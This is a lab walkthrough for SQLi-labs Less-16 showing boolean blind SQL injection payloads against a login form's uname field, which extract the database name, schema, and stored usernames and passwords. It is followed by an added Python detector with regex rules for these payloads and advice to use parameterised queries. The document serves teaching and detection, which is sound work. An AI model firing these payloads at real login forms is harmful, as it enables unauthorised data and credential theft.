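Less-16 Boolean Blind Injection
Capture the request with Burp Suite.
Inject through the POST data field of the HackBar plugin.
Method 1: Boolean blind injection
Identify the injection point:
uname=") or 1=1 # &passwd=&submit=Submit
The page shows a successful login, which means the closure is ("") and an injection vulnerability exists.
Guess the current database name:
Guess the length of the database name: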
uname=") or length(database())>5# &passwd=&submit=Submit
First letter: uname=") or ascii(substr(database(),1,1))>100 # &passwd=&submit=Submit
Determine the table names in the security database:
First letter of the first table:
uname=") or ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>10 # &passwd=&submit=Submit
Guess the columns of the users table:
First letter of the first column:
uname=") or ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>10 # &passwd=&submit=Submit
Guess the contents of the username column:
uname=") or ascii(substr((select username from security.users limit 0,1),1,1))>10 # &passwd=&submit=Submit
Guess the contents of the password column:
uname=") or ascii(substr((select password from security.users limit 0,1),1,1))>10 # &passwd=&submit=Submit
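From the defender's side, every request in this walkthrough has the same recognisable shape: a quote breakout, a comparison on ascii(substr(...)) or length(database()), and a trailing comment, repeated many times from one source. The following is an added example, not part of the original post, that flags that shape in logged POST bodies; the rule names, the threshold and the sample log events are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Rule names and the threshold below are assumptions made for this example.
RULES = {
    "quote_breakout_boolean": re.compile(r"""["']\s*\)*\s*(or|and)\b""", re.I),
    "char_inference": re.compile(r"\b(ascii|ord)\s*\(\s*(substr|substring|mid)\s*\(", re.I),
    "length_probe": re.compile(r"\blength\s*\(\s*database\s*\(\s*\)\s*\)\s*[<>=]", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "trailing_comment": re.compile(r"(#|--\s)\s*$"),
}
INFERENCE = {"char_inference", "length_probe"}

# Constructed log events (source IP, POST body); IPs are documentation ranges.
SAMPLE = [
    ("198.51.100.7", 'uname=admin&passwd=admin&submit=Submit'),
    ("192.0.2.10", 'uname=") or 1=1 # &passwd=&submit=Submit'),
    ("192.0.2.10", 'uname=") or length(database())>5# &passwd=&submit=Submit'),
    ("192.0.2.10", 'uname=") or ascii(substr(database(),1,1))>100 # &passwd=&submit=Submit'),
    ("192.0.2.10", 'uname=") or ascii(substr(database(),1,1))>110 # &passwd=&submit=Submit'),
]

def classify(body):
    """Return {field: sorted rule names} for each form field that matches a rule."""
    hits = {}
    for field, value in parse_qsl(body, keep_blank_values=True):
        matched = sorted(name for name, rx in RULES.items() if rx.search(value))
        if matched:
            hits[field] = matched
    return hits

def inference_sources(events, threshold=3):
    """Sources that sent at least `threshold` requests carrying inference probes."""
    counts = Counter()
    for src, body in events:
        rules = {r for matched in classify(body).values() for r in matched}
        if rules & INFERENCE:
            counts[src] += 1
    return sorted(src for src, n in counts.items() if n >= threshold)

if __name__ == "__main__":
    for src, body in SAMPLE:
        print(src, classify(body))
    print("sources to review:", inference_sources(SAMPLE))
```

Pattern matching of this kind is a detection aid only; the query itself is fixed by binding uname and passwd as parameters instead of concatenating them into the SQL string.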